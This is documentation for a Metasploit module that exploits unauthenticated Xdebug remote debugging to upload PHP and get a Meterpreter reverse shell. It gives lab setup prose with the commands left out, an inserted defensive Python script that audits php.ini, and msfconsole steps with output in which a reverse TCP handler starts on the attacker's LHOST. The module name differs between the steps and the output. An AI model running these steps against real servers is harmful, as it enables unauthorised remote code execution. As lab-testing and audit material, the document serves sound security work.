Path: blob/master/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
Vulnerable Application
Xdebug is an actively maintained PHP debugging tool that supports remote debugging of server-side PHP code.
This module exploits an unauthenticated vulnerability that allows for the upload of a PHP file and subsequent execution to provide a Meterpreter session back. The module was tested on XDebug version 2.5.5.
The vulnerability was discovered by Ricter Zheng (WARNING: This link is in Chinese. Google Translate version)
Setting up XDebug 2.5.5 on xUbuntu 16.04 x64 Desktop
Start with a LAMP server:
Now grab XDebug, specifically the version cited by @MinatoTW:
Paste the contents of your php -i output into the XDebug installation wizard, which gave me the following:
The final step of the wizard is to configure php.ini:
Now that the PHP CLI environment is configured, repeat the above steps for the Apache2 configuration:
And restart Apache2 for good measure:
And now test that XDebug is working:
You should see a fairly small number, in my case 4.6014785766602E-5, which is the number of seconds since the PHP script started, hence the incredibly small value.
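Because the CLI and Apache2 configurations are set up separately above, each one needs its own audit once debugging is finished. The following is an added example (not part of the module or its documentation) that flags Xdebug 2.x remote-debugging settings in php.ini text; the directive names come from the Xdebug 2.x documentation rather than this page, and the function names, placeholder extension path and sample configurations are constructed for illustration.

```python
LOOPBACK = {"localhost", "127.0.0.1", "::1"}
TRUTHY = {"1", "on", "true", "yes"}

def parse_ini(text):
    """Parse php.ini-style text into (settings, zend_extensions); last value wins."""
    settings, extensions = {}, []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment in php.ini
        if "=" not in line or line.startswith("["):
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip("\"'")
        if key.lower() == "zend_extension":
            extensions.append(value)
        else:
            settings[key.lower()] = value
    return settings, extensions

def audit_xdebug(text):
    """Return findings for Xdebug 2.x remote-debugging exposure in one config."""
    settings, extensions = parse_ini(text)
    if not any("xdebug" in ext.lower() for ext in extensions):
        return []  # extension not loaded, so its directives have no effect
    def enabled(key):
        return settings.get(key, "0").lower() in TRUTHY
    if not enabled("xdebug.remote_enable"):
        return []
    findings = ["xdebug.remote_enable is on: remote debugging is active"]
    host = settings.get("xdebug.remote_host", "localhost")  # Xdebug 2.x default
    if enabled("xdebug.remote_connect_back"):
        findings.append("xdebug.remote_connect_back is on: the debugger "
                        "connects to whichever client sent the request")
    elif host.lower() not in LOOPBACK:
        findings.append(f"xdebug.remote_host={host}: debugger traffic leaves the host")
    return findings

# Constructed sample configurations, one per SAPI (not taken from the page).
SAMPLE_CLI = """
zend_extension = /path/to/xdebug.so
xdebug.remote_enable = 0
"""
SAMPLE_APACHE2 = """
zend_extension = /path/to/xdebug.so
; left enabled after a debugging session
xdebug.remote_enable = On
xdebug.remote_connect_back = 1
"""

if __name__ == "__main__":
    for name, text in (("cli", SAMPLE_CLI), ("apache2", SAMPLE_APACHE2)):
        for finding in audit_xdebug(text) or ["no remote-debugging exposure found"]:
            print(f"{name}: {finding}")
```

If Xdebug is loaded from a separate scanned .ini file rather than php.ini itself, pass the concatenation of both files so the zend_extension line and the directives are seen together.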
Verification Steps
Start msfconsole
use exploits/unix/http/xdebug_rce
check
set RHOST 192.168.69.2
set LHOST 192.168.69.1
set VERBOSE true (optional)
exploit
Scenarios
XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18
msf5 exploit(unix/http/xdebug_unauth_exec) > check
[*] 192.168.69.2:80 - Request sent
Date: Fri, 27 Apr 2018 21:00:37 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: XDEBUG_SESSION=WIO6hf4Wez; expires=Fri, 27-Apr-2018 22:00:37 GMT; Max-Age=3600; path=/
Content-Length: 16
Content-Type: text/html; charset=UTF-8
[+] 192.168.69.2:80 - Looks like remote server has xdebug enabled
[*] 192.168.69.2:80 The target service is running, but could not be validated.
msf5 exploit(unix/http/xdebug_unauth_exec) > exploit
[*] Started reverse TCP handler on 192.168.69.1:4444
[*] 192.168.69.2:80 - Waiting for client response.
[*] 192.168.69.2:80 - Receiving response 508[removed] [removed][removed][removed]